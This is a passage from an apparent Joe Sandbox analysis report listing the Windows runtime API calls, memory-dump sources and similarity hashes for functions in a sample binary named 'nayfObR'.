                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 158306478-0
                                                                                            • Opcode ID: 50f52d50433fbaf765d8b497613f39b9c132f23efeb0a5a22f3c4ac4ceb42a42
                                                                                            • Instruction ID: 3ec3453320580e22cbab0585defc2a7b8769cd8b6f4b9ba38e236f6c732aff87
                                                                                            • Opcode Fuzzy Hash: 50f52d50433fbaf765d8b497613f39b9c132f23efeb0a5a22f3c4ac4ceb42a42
                                                                                            • Instruction Fuzzy Hash: D911A1B660291A7F6B2227B55D8EDFFAD9CFEE93943500814F841D2201FA24BD0095B5
                                                                                            APIs
                                                                                            • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,005C357F,00000000,00000001,?,?,?,005BD440,?,00000000,00000000), ref: 005C40A7
                                                                                            • GetLastError.KERNEL32(?,005C357F,00000000,00000001,?,?,?,005BD440,?,00000000,00000000,?,?,?,005BCD86,?), ref: 005C40B3
                                                                                              • Part of subcall function 005C4110: CloseHandle.KERNEL32(FFFFFFFE,005C40C3,?,005C357F,00000000,00000001,?,?,?,005BD440,?,00000000,00000000,?,?), ref: 005C4120
                                                                                            • ___initconout.LIBCMT ref: 005C40C3
                                                                                              • Part of subcall function 005C40E5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,005C4081,005C356C,?,?,005BD440,?,00000000,00000000,?), ref: 005C40F8
                                                                                            • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,005C357F,00000000,00000001,?,?,?,005BD440,?,00000000,00000000,?), ref: 005C40D8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                            • String ID:
                                                                                            • API String ID: 2744216297-0
                                                                                            • Opcode ID: c18dc54998e9a26aece28aceeca2b8fc4301fe07e58c09fee524819261ce6a7b
                                                                                            • Instruction ID: d2a7fcb6c166b09d01889a39e595b58c6f93fbd177d42380ce6a8c9467026c66
                                                                                            • Opcode Fuzzy Hash: c18dc54998e9a26aece28aceeca2b8fc4301fe07e58c09fee524819261ce6a7b
                                                                                            • Instruction Fuzzy Hash: 35F0303A441525BFCF221FD2EC0DE893F26FB583A0B048815FA59A5130C6328820FF94
                                                                                            APIs
                                                                                              • Part of subcall function 005B524A: GetLastError.KERNEL32(00000000,?,005B75CD), ref: 005B524E
                                                                                              • Part of subcall function 005B524A: SetLastError.KERNEL32(00000000,?,?,00000028,005B1B63), ref: 005B52F0
                                                                                            • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,005AF3D9,?,?,?,00000055,?,-00000050,?,?,?), ref: 005B9AE5
                                                                                            • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,005AF3D9,?,?,?,00000055,?,-00000050,?,?), ref: 005B9B1C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CodePageValid
                                                                                            • String ID: utf8
                                                                                            • API String ID: 943130320-905460609
                                                                                            • Opcode ID: 310867bf0832a303438d830a766feb7899954e8620f92b64f2680636cdfd8664
                                                                                            • Instruction ID: de9438966a36921f33c1eefab142351ba28290f624121ca2c5c5d71264b685b6
                                                                                            • Opcode Fuzzy Hash: 310867bf0832a303438d830a766feb7899954e8620f92b64f2680636cdfd8664
                                                                                            • Instruction Fuzzy Hash: FF51D371604716AAEB25AB748C46FF67FA8FF84700F244829F7459B181FA70FC80C6A5
                                                                                            APIs
                                                                                            • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,005B4971,?,?,00000000,00000000,00000000,?), ref: 005B4A95
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: EncodePointer
                                                                                            • String ID: MOC$RCC
                                                                                            • API String ID: 2118026453-2084237596
                                                                                            • Opcode ID: f6e792b274fd5887b350c8d074dc951769b6944f85051ad9d33c75df3c678a44
                                                                                            • Instruction ID: a05a4541dd35b61673386abcde6809edf13dd317e7c591691a7cba43009d44d4
                                                                                            • Opcode Fuzzy Hash: f6e792b274fd5887b350c8d074dc951769b6944f85051ad9d33c75df3c678a44
                                                                                            • Instruction Fuzzy Hash: AE411771900209AFCF25DF98C985AEEBBB5FF48304F148159FA0466262D335EA60DF51
                                                                                            APIs
                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 005B4553
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___except_validate_context_record
                                                                                            • String ID: csm$csm
                                                                                            • API String ID: 3493665558-3733052814
                                                                                            • Opcode ID: 53dacdfd04feabf8fe1187762ce52cf6a95ca14376bc500178c1e86366b4c014
                                                                                            • Instruction ID: 12bb32774ecd432621c773dacad8ecc13bb024b10c0bf126fb6749a857e2e27c
                                                                                            • Opcode Fuzzy Hash: 53dacdfd04feabf8fe1187762ce52cf6a95ca14376bc500178c1e86366b4c014
                                                                                            • Instruction Fuzzy Hash: 9031AD72800219ABCF368F54CC459EE7F6AFF5A315B18865AF8544A163C332ECA1DF81
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005A2DEE
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005A2E19
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                            • String ID: G&Z
                                                                                            • API String ID: 593203224-3270801817
                                                                                            • Opcode ID: c2e2110dc09828770d75c462e6e51b32c196efe937e006f524467acf39743530
                                                                                            • Instruction ID: f40a7de95db70a668f2a3a13f93a391491367275e9b0012da1ff672204f73262
                                                                                            • Opcode Fuzzy Hash: c2e2110dc09828770d75c462e6e51b32c196efe937e006f524467acf39743530
                                                                                            • Instruction Fuzzy Hash: BC01E4B0E00209DFCB04EFA8D845AADBBF0FF59300F4004AAE806AB351EB346A54DF55